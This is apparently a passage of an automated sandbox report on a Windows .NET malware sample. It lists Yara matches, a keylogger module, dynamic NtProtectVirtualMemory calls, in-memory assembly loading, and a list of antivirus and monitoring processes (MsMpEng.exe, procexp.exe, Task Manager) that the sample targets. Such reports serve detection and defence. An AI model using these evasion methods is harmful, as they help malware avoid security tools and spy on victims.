Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
Source: 0pF5Vz4xG4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 0pF5Vz4xG4.exe Static file information: File size 6596488 > 1048576
Source: 0pF5Vz4xG4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: 0pF5Vz4xG4.exe, ClientSocket.cs .Net Code: Invoke System.AppDomain.Load(byte[])

Boot Survival

Source: Yara match File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Malware Analysis System Evasion

Source: Yara match File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR
Source: 0pF5Vz4xG4.exe Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

HIPS / PFW / Operating System Protection Evasion

Source: 0pF5Vz4xG4.exe, Keylogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 0pF5Vz4xG4.exe, DInvokeCore.cs Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 0pF5Vz4xG4.exe, AntiProcess.cs Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: MSASCui.exe
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: procexp.exe
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: MsMpEng.exe